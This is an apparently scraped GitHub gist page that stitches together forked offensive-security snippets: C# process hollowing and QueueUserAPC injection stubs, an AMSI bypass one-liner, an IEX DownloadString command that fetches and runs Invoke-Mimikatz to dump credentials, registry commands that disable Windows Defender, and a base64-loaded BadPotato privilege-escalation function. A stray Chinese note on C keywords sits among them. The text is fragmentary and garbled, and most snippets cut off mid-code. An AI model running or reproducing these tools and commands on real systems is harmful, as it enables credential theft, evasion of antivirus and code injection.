

bopin2020 / Hollowing.cs
Created February 18, 2021 01:44 — forked from smgorelik/Hollowing.cs
Simple Process Hollowing C#
/***************
* Simple Process Hollowing in C#
*
* #Build Your Binaries
* c:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe Hollowing.cs /unsafe
*
* @author: Michael Gorelik <smgorelik@gmail.com>
* gist.github.com/smgorelik/9a80565d44178771abf1e4da4e2a0e75
* #Most of the code taken from here: @github: github.com/ambray
# Pulled from https://gist.github.com/jivoi/c354eaaf3019352ce32522f916c03d70
# Description:
# Collection of PowerShell one-liners for red teamers and penetration testers to use at various stages of testing.
# AMSI Bypass (Matt Graeber)
Normal Version
------------------------
[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)
bopin2020 / Quick-Mimikatz
Created February 18, 2021 13:18 — forked from gfoss/Quick-Mimikatz
Quick Mimikatz
*NOTE - These pull from public GitHub repos that are not under my control. Make sure you trust the content (or better yet, make your own fork) before using it!*
#mimikatz [local]
IEX (New-Object Net.WebClient).DownloadString("https://raw.githubusercontent.com/BC-SECURITY/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1"); Invoke-Mimikatz -Command privilege::debug; Invoke-Mimikatz -DumpCreds;
#encoded-mimikatz [local]
powershell -enc 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
function Invoke-Mimikatz
{
<#
.SYNOPSIS
This script leverages Mimikatz 2.2.0 and Invoke-ReflectivePEInjection to reflectively load Mimikatz completely in memory. This allows you to do things such as
dump credentials without ever writing the mimikatz binary to disk.
The script has a ComputerName parameter which allows it to be executed against multiple computers.
This script should be able to dump credentials from any version of Windows through Windows 8.1 that has PowerShell v2 or higher installed.
java -cp .\java-decompiler.jar org.jetbrains.java.decompiler.main.decompiler.ConsoleDecompiler -dgs=true .\cs_bin\cobaltstrike.jar .\cs_src\
/*
C
const
static
static const 区别
*/
const 表示常量,存储在静态存储区。
static 修饰变量 仅作用在当前文件内
bopin2020 / DInjectQueuerAPC.cs
Created March 3, 2021 00:32 — forked from jfmaes/DInjectQueuerAPC.cs
.NET process injection into a new process with QueueUserAPC using D/Invoke - compatible with GadgetToJScript
using System;
using System.Diagnostics;
using System.IO;
using System.Runtime.InteropServices;
namespace DinjectorWithQUserAPC
{
public class Program
### Related to Malwarebytes LazyScripter https://blog.malwarebytes.com/malwarebytes-news/2021/02/lazyscripter-from-empire-to-double-rat
reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtime
function Invoke-BadPotato
{
[CmdletBinding()]
Param (
[String]
$Command = "whoami"
)
$a=New-Object IO.MemoryStream(,[Convert]::FromBAsE64String("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
bopin2020 / process-hollowing.cs
Created March 12, 2021 11:25 — forked from med0x2e/process-hollowing.cs
Process Hollowing (slightly updated to work with G2JS) - credits for the initial code go to @smgorelik and @ambray
using System;
using System.Collections.Generic;
using System.Runtime.InteropServices;
using System.Text;
namespace Hollowing
{
public class Loader
{
public static byte[] target_ = Encoding.ASCII.GetBytes("calc.exe");